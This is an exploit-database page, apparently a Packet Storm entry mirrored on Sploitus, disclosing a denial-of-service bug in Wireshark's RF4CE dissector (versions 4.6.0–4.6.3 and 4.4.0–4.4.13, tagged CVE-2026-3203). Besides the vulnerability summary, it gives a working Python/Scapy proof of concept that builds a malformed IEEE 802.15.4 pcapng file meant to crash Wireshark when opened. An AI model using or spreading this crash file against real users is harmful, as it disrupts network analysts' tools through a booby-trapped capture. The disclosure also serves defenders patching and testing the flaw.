## https://sploitus.com/exploit?id=PACKETSTORM:216621
=============================================================================================================================================
| # Title : Wireshark 4.6.0โ4.6.3 4.4.0โ4.4.13 RF4CE Profile via Malformed IEEE 802.15.4 Dissector Crash โ Denial of Service |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.wireshark.org/ |
=============================================================================================================================================
[+] Summary : A vulnerability in the RF4CE Profile protocol dissector of Wireshark versions 4.6.0โ4.6.3 and 4.4.0โ4.4.13 allows an attacker
to trigger a Denial of Service (DoS) condition by supplying a specially crafted IEEE 802.15.4 packet capture file.
The flaw exists in the handling of malformed RF4CE security-enabled frames. By manipulating security-related fields
and providing inconsistent encrypted payload lengths, the dissector may attempt improper memory operations during
decryption processing (notably in CCM security handling routines).
This can lead to a segmentation fault and application crash when the malicious .
pcapng file is opened in a vulnerable Wireshark version.
An attacker can exploit this vulnerability by distributing a malicious capture file, which, when analyzed, causes Wireshark to terminate unexpectedly.
[+] POC :
from scapy.all import *
from scapy.layers.zigbee import *
output_file = "rf4ce_crash_poc.pcapng"
print(f"[+] Generating Malformed RF4CE Packet to trigger CVE-2026-3203...")
dot154 = Dot154(fcf_frametype=1, fcf_security=1, fcf_panidcomp=1, seqnum=0x42)
dot154_addressing = Dot154Data(dest_panid=0x1234, dest_addr=0x0001, src_addr=0x0002)
rf4ce_nwk = Raw(load=b"\x0c\xff\xff\xff\xff")
malformed_security_payload = Raw(load=b"\x01" * 50)
pkt = dot154 / dot154_addressing / rf4ce_nwk / malformed_security_payload
wrpcap(output_file, pkt)
print(f"[+] File '{output_file}' has been created.")
print(f"[!] Warning: Opening this file in Wireshark 4.6.0-4.6.3 will cause a CRASH.")
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================